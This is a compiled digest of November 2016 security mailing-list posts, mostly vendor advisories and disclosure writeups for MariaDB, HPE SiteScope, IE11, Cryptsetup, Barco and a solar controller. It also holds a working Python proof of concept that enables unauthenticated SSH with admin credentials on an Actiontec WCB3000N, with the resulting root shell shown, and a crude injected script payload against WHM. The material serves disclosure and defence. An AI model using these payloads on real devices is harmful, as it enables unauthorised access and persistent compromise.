[SECURITY] [DSA 3711-1] mariadb-10.0 security update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3711-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
November 11, 2016 https://www.debian.org/security/faq
- -

Package: mariadb-10.0
CVE ID : CVE-2016-3492 CVE-2016-5584 CVE-2016-5616 CVE-2016-5624
 CVE-2016-5626 CVE-2016-5629 CVE-2016-6663 CVE-2016-7440
 CVE-2016-8283

Several issues have been discovered in the MariaDB database server. The
vulnerabilities are addressed by upgrading MariaDB to the new upstream
version 10.0.28. Please see the MariaDB 10.0 Release Notes for further
details:

 https://mariadb.com/kb/en/mariadb/mariadb-10028-release-notes/

For the stable distribution (jessie), these problems have been fixed in
version 10.0.28-0+deb8u1.

For the testing distribution (stretch), these problems have been fixed
in version 10.0.28-1.

For the unstable distribution (sid), these problems have been fixed in
version 10.0.28-1.

We recommend that you upgrade your mariadb-10.0 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQJ8BAEBCgBmBQJYJjGQXxSAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w
ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXQ0NjQ0NDA5ODA4QzE3MUUwNTUzMURERUUw
NTRDQjhGMzEzNDNDRjQ0AAoJEAVMuPMTQ89EWJ8P+wTJ0uB9OWSJr69mkPYIuVd+
54t7OEbarS2RIkNkfnsaDHrOwOYREAyfgidCeBgcY3WquNUJ5VZINojYPs80Ln2/
+YTFyZab8XwJkdyHaJtdXbQTkZ6zJxOcVUr7HjpYJzk11gJ9KNqBfnRONs5Z3lvY
zwb6HDppIS4nx4Xax9FoO+FqMEkYmzrM5wlqqsXggLadCDCgpkacuEJfY8oG2RZj
cVyj7ZF7VQYfxQF41wqI3Hb1n6N+uUpM3bnYrX4mmCLcaMXgr767nyvwrC/Yi8Ej
wjtaWLzGNhZYw31oWgOX9IsEUp8/mIqmNdDSo5J1ll8hYTJ2thcfESlVIb2PDNDr
8o3gK9GvI8qWY/Z4lbC+yM9F5UUqqwBCjGA6g1Nt2d6zC+OjThLB0KA/80TcDJbX
QABfIDDSdSHT7WQdUqtHhgAvUMdHMVAcHKr/HWsD6OJi4fM3Lb8sTeAK8u80Xy4w
gZbluPpbcQ7OQvkbthLdL/cTWpg72HrNVEM9NZep8hygiKX3iMsORUFJCRJNXKeN
W8cR/0TQ4h3o6+hndSVqBtc6D8Lpj2Jvkc3oj/wHGIjKT/mKwxkDkp5ADItkZooA
/eT8kBdWGF2wqY9dmrkMjXOrXGPC5D4DuFFf7B69fhqxhpvj3PpeXYjxUhJwzMUt
S6zvuuUrAXFt5l9hToF5
=Rx+N
-END PGP SIGNATURE-

CVE-2016-9277: A IDX Out of Bound vulnerability in systemui can make crash and ui restart

[unlimitsec]

Description of the potential vulnerability:
Severity: Low
Affected versions: L(5.0/5.1), M(6.0)
Disclosure status: Privately disclosed.
One of the activities in SystemUI can produce array index out of bounds 
exception as a combination of some APIs and it leads to UI restart.
The patch fixes the vulnerability in the corresponding APIs.

Fix:
http://security.samsungmobile.com/smrupdate.html#SMR-NOV-2016
SVE-2016-6906: A IDX Out of Bound vulnerability in systemui can make crash and 
ui restart

Sincerely,

Alipay unLimit Security Team 

WHM Panel Mail Delivery Reports crash database Vulnerability

[iedb . team]

Mail Delivery Reports crash database in whm panel 60.0 ( build 17) version 
local exploit
Pic:http://kkli.ir/C6LGY

#

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : WHM Panel Mail Delivery Reports crash database Vulnerability

# Vulnerability : Crash sendmail Database in whm panel

# Version : WHM 60.0 (build 17) 

# Local Vulnerability

# Method(s): POST

# pic : http://kkli.ir/C6LGY

# Author : IeDb.Ir

# Home : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site and insert site sqli and xss bug : 
http://xssed.Ir

# iedb team Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

# Email : iedb.t...@gmail.com

# Archive Exploit : http://iedb.ir/exploits-6209.html

#

# Description:

Hello friends.
The vulnerability is local in both panel which makes crash the email database.


Enter the login panel
In the Email field, enter the Mail Delivery Reports in.
It can do a search on email.
In this field you can put your own code in the search field.
For example, I put this code:
 alert ( 'Iedb.ir') 
As you can see in the image below, email database has crashed.

http://kkli.ir/C6LGY


In this field, you can enter input other great causing the crash database.
This bug bugs for local and remote as it is written.
And this security problem exists in all versions of whm panel.
Other remote exploits and exploit this panel are private.


Thanks to all friends

#

Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir

#

# Archive Exploit = http://iedb.ir/exploits-6209.html

#

[CVE-2016-8736] Apache Openmeetings RMI Registry Java Deserialization RCE

[Maxim Solodovnik]

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected: Apache OpenMeetings 3.1.0

Description: Apache Openmeetings is vulnerable to Remote Code
Execution via RMI deserialization attack

The issue was fixed in 3.1.2
All users are recommended to upgrade to Apache OpenMeetings 3.1.3

Credit: This issue was identified by Jacob Baines, Tenable Network Security


Apache OpenMeetings Team

WHM Panel Mail Delivery Reports crash database Vulnerability

[iedb . team]

Mail Delivery Reports crash database  Local Vulnerability in WHM Panel All 
Version

###

# WHM Panel Mail Delivery Reports crash database Vulnerability

###

#

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : WHM Panel Mail Delivery Reports crash database Vulnerability

# Vulnerability : Crash sendmail Database in whm panel

# Version : WHM 60.0 (build 17) 

# Local Vulnerability

# Method(s): POST

# pic : http://kkli.ir/C6LGY

# Author : IeDb.Ir

# Home : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site and insert site sqli and xss bug : 
http://xssed.Ir

# iedb team Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

# Email : iedb.t...@gmail.com

# Archive Exploit : http://iedb.ir/exploits-6209.html

#

# Description:

Hello friends.
The vulnerability is local in both panel which makes crash the email database.


Enter the login panel
In the Email field, enter the Mail Delivery Reports in.
It can do a search on email.
In this field you can put your own code in the search field.
For example, I put this code:
 alert ( 'Iedb.ir') 
As you can see in the image below, email database has crashed.

http://kkli.ir/C6LGY


In this field, you can enter input other great causing the crash database.
This bug bugs for local and remote as it is written.
And this security problem exists in all versions of whm panel.
Other remote exploits and exploit this panel are private.


Thanks to all friends

#

Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir

#

# Archive Exploit = http://iedb.ir/exploits-6209.html

#

###

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-12]

###

CVE-2015-0040: Microsoft Internet Explorer 11 MSHTML CMapElement::Notify use-after-free details

[Berend-Jan Wever]

Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
tenth entry in that series.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161114001.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Internet Explorer 11 MSHTML CMapElement::Notify use-after-free

(MS15-009, CVE-2015-0040)

Synopsis

A specially crafted web-page can cause MSIE 11 to interrupt the handling
of one `readystatechange` event with another. This interrupts a call to
one of the various `CElement::Notify` functions to make
another such call and at least one of these functions is non-reentrant.
This can have various repercussions, e.g. when an attacker triggers this
vulnerability using a `CMapElement` object, a reference to that object
can be stored in a linked list and the object itself can be freed. This
pointer can later be re-used to cause a classic use-after-free issue.


Known affected versions, attack vectors and mitigations
---
* Microsoft Internet Explorer 11
  An attacker would need to get a target user to open a specially
  crafted web-page. Disabling JavaScript should prevent an attacker from
  triggering the vulnerable code path.

Description
---
When a `DocumentFragment` containing an applet element is added to the
DOM, all elements receive a notification that they are removed from the
`CMarkup`. Next, they are added to the DOM and receive notification of
being added to another `CMarkup`. When the applet is added, a
`CObjectElement` is created and added to the `CMarkup`. This causes a
`readystatechange` event to fire, which interrupts the current code.
During this `readystatechange` event, the DOM may be modified, which
causes further notifications to fire. However, elements in the
`DocumentFragment` that come after the applet element have already
received a notification that they have been remove from one `CMarkup`,
but not that they have been added to the new one. Thus, these elements
may receive another notification of removal, followed by two
notifications of being added to a `CMarkup`.

AFAICT, this event-within-an-event itself is the root cause of the bug
and allows memory corruption in various ways. I discovered the issue
because the code in `CMapElement::Notify` is non-reentrant and does not
handle this sequence of events well. This code maintains a singly linked
list of map elements that have been added to the document. An object
should never be added to this list twice, as this will cause a loop in
the list (a map element pointing to itself as the next in
the list). However, the event-within-an-event can be used to first cause
two consecutive calls to remove the same element from this list followed
by two calls to add the same element to the list. This results in the
following sequence of events:

* The first call to remove the element will remove it from the list.
* The second call to remove the element will do nothing.
* The first call to add the element will add it to the list.
* The second call to add the element will try to add it to the list
  again,  causing the list to contain a loop. This list is now corrupt.

At this point, an attacker can remove the `CMapElement`, causing the
code to try to remove it from the list and free it. However, because of
the loop in the list, the above code will not actually remove it from
the list. After this, the pointer in the list points to freed memory and
an attacker can force MSIE to reuse it.

Time-line
-
* *September 2014*: This vulnerability was found through fuzzing.
* *September 2014*: This vulnerability was submitted to ZDI.
* *September 2014*: This vulnerability was acquired by ZDI.
* *February 2015*: Microsoft address this issue in MS15-009.
* *November 2016*: Details of this issue are released.

Cheers,

SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

SEC Consult SA-20161114-0 :: Multiple vulnerabilities in I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2

[SEC Consult Vulnerability Lab]

SEC Consult Vulnerability Lab Security Advisory < 20161114-0 >
===
  title: Multiple vulnerabilities
product: I-Panda SolarEagle - Solar Controller Administration
 Software / MPPT Solar Controller SMART2
 vulnerable version: SolarEagle V2.00 / MPPT Solar Controller SMART2
  fixed version: -
 CVE number: -
 impact: Medium
   homepage: http://www.solarcontroller-inverter.com/
  found: 2016-09-03
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"ShenZhen I-Panda Electronics Co. Ltd. is developing power supply devices
such as UPS, power adapter and power inverter and also equipment for solar
systems. This equipment produced by I-Panda comprises solar panels/
controllers/inverters and also solar generator systems."

Source: http://www.solarcontroller-inverter.com/about-us.html


Business recommendation:

SEC Consult recommends not to use this product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) Broken Local Admin Authentication in SolarEagle V2.00
Attackers which have access to the locally installed software are able to
bypass the administrative login and can control the MPPT Solar Controller.

2) Missing Server Side Authentication in MPPT Solar Controller SMART2
Attackers which have access to the local network can send their own commands
to the MPPT Solar Controller and are able to control the device this way.

3) Unencrypted Communication in MPPT Solar Controller SMART2
Eavesdropping the communication is possible since unencrypted TCP is used
for all packets which are transferred between the controller and SolarEagle.

4) Denial of Service in MPPT Solar Controller SMART2
Attackers are able to disrupt an active connection as long as they want.


Proof of concept:
-
The vendor was not responsive, hence there is no fix available. The proof of
concept has been removed from this advisory.


Vulnerable / tested versions:
-
SolarEagle V2.00 / MPPT Solar Controller SMART2


Vendor contact timeline:

2016-09-12: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Vendor: (Instant-Messenger) No encryption available. Offer to
send the advisory unencrypted; No Answer
2016-10-29: Offer to send the advisory unencrypted; No Answer
2016-11-03: Offer to send the advisory unencrypted; No Answer
2016-11-14: SEC Consult releases security advisory


Solution:
-
There is no fix available from the vendor as they did not respond.


Workaround:
---
No workaround


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF 

Multiple vulnerabilities in Barco Clickshare

[vincent.ruijter]

CVE-2016-3149 - Remote Code Execution in Barco ClickShare CSC-1 and CSM-1
Affected versions: all versions prior to v01.09.03 (CSC-1) and v01.06.02 
(CSM-1).
A remote code execution vulnerability exists within the Barco ClickShare base 
unit software, that could lead to full compromise of the appliance.

CVE-2016-3150 - Cross-site Scripting in Barco ClickShare CSC-1, CSM-1 and 
CSE-200
Affected versions:  all versions prior to v01.09.03 (CSC-1), v01.06.02 (CSM-1) 
and v01.03.02 (CSE-200)
A Cross-Site Scripting vulnerability exists within Barco ClickShare's CSC-1 
base unit's wallpaper.php due to invalid input and output sanitisation. 

CVE-2016-3151 - Path Traversal in Barco ClickShare CSC-1, CSM-1 and CSE-200
Affected versions: all versions prior to v01.09.03 (CSC-1),  v01.06.02 (CSM-1) 
and v01.03.02 (CSE-200).
A Path Traversal vulnerability exists within Barco ClickShare's wallpaper 
parsing functionality, which leads to disclosure of the /etc/shadow file on the 
file system. 

CVE-2016-3152 - /etc/shadow file disclosure in the CSC-1 firmware update
Affected versions: all versions prior to v01.09.03 (CSC-1)
It is possible to download and extract the firmware image of the CSC-1 and 
obtain the root password.

The vendor has acknowledged and patched the aforementioned issues. It is 
recommended to download and apply the most recent firmware update for your 
appliance.

References:
http://www.barco.com/en/mybarco/mysupport/documentation/software/software-detail?nr=R33050020&rev=00100209
http://www.barco.com/en/mybarco/mysupport/productsupport/software/software-detail?nr=R33050037&rev=001001000113
https://www.barco.com/en/mybarco/mysupport/productsupport/software/software-detail?nr=R33050070&rev=00100108

--

Regards,

Vincent Ruijter
Ethical Hacker
Chief Information Security Office
KPN B.V.

[security bulletin] HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05324755
Version: 1

HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote
Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary
Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified in HPE SiteScope. The
vulnerabilities could be exploited to allow local elevation of privilege and
exploited remotely to allow denial of service, arbitrary code execution,
cross-site request forgery.

References:

  - CVE-2014-0114 - Apache Struts, execution of arbitrary code
  - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
  - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions 
  - CVE-2015-3253 - Apache Groovy, execution of arbitrary code 
  - CVE-2015-5652 - Python, elevation of privilege
  - CVE-2013-6429 - Spring Framework, cross-site request forgery
  - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
  - PSRT110264

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP SiteScope Monitors Software Series 11.2x−11.32IP1

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2013-6429
  6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
  6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

CVE-2014-0050
  8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2014-0107
  8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2014-0114
  6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2015-3253
  7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2015-5652
  8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)

CVE-2016-0763
  6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
  6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided a resolution via an update to HPE SiteScope. Details on the
update and each vulnerability are in the KM articles below.

  **Note:** The resolution for each vulnerability listed is to upgrade to
SiteScope 11.32IP2 or an even more recent version of SiteScope if available.
The SiteScope update can be can found in the personal zone in "my updates" in
HPE Software Support Online: .


  * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): 

+



  * Apache Struts: KM02553983 (CVE-2014-0114):

+



  * Apache Tomcat: KM02553990 (CVE-2016-0763):

+


  * Apache XML Xalan: KM02553991 (CVE-2014-0107):

+


  * Apache Groovy: KM02553992 (CVE-2015-3253):

+


  * Python: KM02553997 (CVE-2015-5652):

*


  * Spring Framework: KM02553998 (CVE-2013-6429):

+


HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subsc

[security bulletin] HPSBUX03665 rev.2 - HP-UX Tomcat-based Servlet Engine, Remote Denial of Service (DoS) and URL Redirection

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324759

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05324759
Version: 2

HPSBUX03665 rev.2 - HP-UX Tomcat-based Servlet Engine, Remote Denial of
Service (DoS) and URL Redirection

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-09
Last Updated: 2016-11-08

Potential Security Impact: Remote: Denial of Service (DoS), URL Redirection

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in the HP-UX
Tomcat-based Servlet Engine. These vulnerabilities could be exploited
remotely to create a Denial of Service (DoS) and URL Redirection.

References:

  - PSRT110272
  - CVE-2016-3092 - Remote denial of Service (DoS)
  - CVE-2016-5388 - Remote URL Redirection
  - PSRT110255

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP-UX Tomcat-based Servlet v.7.x Engine B.11.31 - Tomcat 7 prior to
D.7.0.70.01

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-3092
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)

CVE-2016-5388
  8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
  5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following software update to resolve the vulnerabilities
in HP-UX Apache Tomcat 7 Servlet Engine:

 * Tomcat 7.0.70.01 for HP-UX Release B.11.31 (IPF and PA-RISC)

+ 64 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-64.depot
+ 32 bit Depot: HP_UX_11.31_HPUXWS24ATW-B501-11-31-32.depot

* **Note:** The depot file can be found here:

+


**MANUAL ACTIONS: Yes - Update**

Download and install the software update

**PRODUCT SPECIFIC INFORMATION**

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HPE and lists recommended actions that may apply to a specific
HP-UX system. It can also download patches and create a depot automatically.
For more information see:
 
  *


The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.31 IA/PA
===  
hpuxws22TOMCAT.TOMCAT
hpuxws22TOMCAT.TOMCAT2
action: install revision D.7.0.70.01 or subsequent

END AFFECTED VERSIONS

HISTORY

Version:1 (rev.1) - 4 November 2016 Initial release

Version:2 (rev.2) - 8 November 2016 Removed extraneous text from background
section


Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notic

CVE-2016-4484: - Cryptsetup Initrd root Shell

[Hector Marco]

Hello All,


Affected package

Cryptsetup <= 2:1


CVE-ID
--
CVE-2016-4484


Description
---
A vulnerability in Cryptsetup, concretely in the scripts that unlock the
system partition when the partition is ciphered using LUKS (Linux
Unified Key Setup).

This vulnerability allows to obtain a root initramfs shell on affected
systems. The vulnerability is very reliable because it doesn't depend on
specific systems or configurations. Attackers can copy, modify or
destroy the hard disc as well as set up the network to exflitrate data.

In cloud environments it is also possible to remotely exploit this
vulnerability without having "physical access."


Full description:
-
http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetup_initrd_shell.html


Regards,
Hector Marco & Ismael Ripoll.



signature.asc
Description: OpenPGP digital signature

Actiontec WCB3000N (Telus Branded) Local Unauthenticated Privilege Elevation and Password Reset

[Andrew Klaus]

###  Device Details
Vendor: Actiontec (Telus Branded)
Model: WCB3000N
Affected Firmware: v0.16.2.5
Device Manual: 
http://static.telus.com/common/cms/files/internet/wifi_plus_extender.pdf
Reported: November 2015
Status: Fixed on newest pushed firmware version
CVE:  Update is handled by the vendor, therefore no CVE needed.

The Telus Actiontec WCB3000N is a access-point/bridge for MoCA,
Gigabit Ethernet, and both 802.11AGN 2.4GHz and 5GHz wireless
spectrums. It provides a web interface that allows control and
configuration of each of these technologies.

###   Summary of Findings
The Forgot Password webpage (http:///forgot_password.html)
asks for the device’s physical serial number before the admin password
can be reset. Any attacker on the same network as the device can pull
the device’s serial number from javascript without requiring physical
access to the device and can then reset the user password.
SSH can be enabled and used by an attacker without any authentication.
Files are stored, whether malicious or not, on the read-write
partition and remain untouched after factory resets.
Both of these attacks requires the attacker to be on the same local
network as the access-point.


### Forgot Password Bypass
There is a javascript function on the "forgot password page" called
getDeviceSerialNum(). It calls the “gotserialnum.cgi” executable and
places the device’s serial number in the device_serial_num variable on
each page load. This serial number variable can be viewed through the
browser's developer console by reading the device_serial_num variable.
Once the serial number is known, the password can be reset. The
attacker needs to be on the same network as the WCB3000N device.



### Enabling SSH and accessing root console
In the html on the Advanced Setup page, there are some references to a
few pages that aren’t displayed by the browser by default. By design,
when accessing the /adv_localssh.html page we get automatically
redirected the the /adv_manage.html page as seen in the javascript
code. However, if we block the javascript from carrying through the
redirect, we can see this page. Following the javascript and html
form, a /advlocalssh.cgi executable is POSTed with form data without
any authentication.

The proof of concept code in python is here:

import requests
ssh_data = {"command": "apply",
"mypage": "adv_localssh.html",
"advanced_ssh_enable":"1",
"advanced_ssh_username":"admin",
"advanced_ssh_password":"admin",
"advanced_ssh_port":"22",
"advanced_ssh_timeout":"",
"sel_ssh_timeout":"1800",
"custom_ssh_timeout": ""}
s = requests.session()
s.post("http:///advlocalssh.cgi", ssh_data)

## Before
[~]$ nmap -p ssh 192.168.1.10
PORT   STATESERVICE
22/tcp filtered ssh

[~]$ python2 wcb.py

## After
[~]$ nmap -p ssh 192.168.1.10
PORT   STATE SERVICE
22/tcp open  ssh

[~]$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@192.168.1.10
admin@192.168.1.10's password:
RLX Linux version 2.0
 _   _  _
| | | ||_|
   _  _ | | _  _| | _   _   _  _  _
  | |/ || |\ \/ /   | || |  _ \| | | |\ \/ /
  | |_/ | |/\   | || | | | | |_| |/\
  |_|   |_|\_/\_/   |_||_|_| |_|\|\_/\_/

For further information check:
http://processor.realtek.com/
#


--

### Other Discoveries
After gaining root access, other discoveries were made. Noticing the
/mnt/rt_conf directory being mounted read-write (which I assume is for
saving the config file state), I placed a dummy file in the directory
and then factory reset the device. The SSH access reverted back to
being disabled, but logging back into the device showed that the dummy
file still existed in /mnt/rt_conf.

OpenSSL is a very dated version (2006), and has 51 CVE vulnerabilities
listed 
https://www.cvedetails.com/vulnerability-list/vendor_id-217/product_id-383/version_id-26306/Openssl-Openssl-0.9.8.html.
  This could pose as a vulnerability when the device speaks over
TR-069 and pulls firmware updates.

# openssl version -a
OpenSSL 0.9.8b 04 May 2006
built on: Fri May 31 13:10:19 CST 2013
platform: rsdk-linux
options:  bn(32,32) md2(int) rc4(ptr,int) des(idx,cisc,4,long)
idea(int) blowfish(idx)
compiler: rsdk-linux-gcc -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS
-D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DTERMIO -Os
-fomit-frame-pointer -Wall
OPENSSLDIR: "/usr/local/ssl"

It’s possible to both kill the TR-069 remote device management service
and rewrite the config to disable. Once disabled, there’s no way that
the vendor would be able to communicate with the device to patch.


### Plausible Uses
An attacker could keep malware stored and have it survive both reboots
and factory resets.

Since there’s a full terminal present on the device along including
utilities such as tcpdump and scp, it would be trivial to to sniff
traffic and Man-in-the-Middle connections passing through the bridge.

DoSsing or bricking the device would likely 

Re: [oss-security] CVE-2016-4484: - Cryptsetup Initrd root Shell

[Leo Famulari]

On Mon, Nov 14, 2016 at 08:45:51PM +, Hector Marco wrote:
> Hello All,
> 
> Affected package
> 
> Cryptsetup <= 2:1

Hi,

Can you clarify which versions are affected?

The latest upstream version is 1.7.3:

https://gitlab.com/cryptsetup/cryptsetup/commits/master

What is the 2:1 version?


signature.asc
Description: PGP signature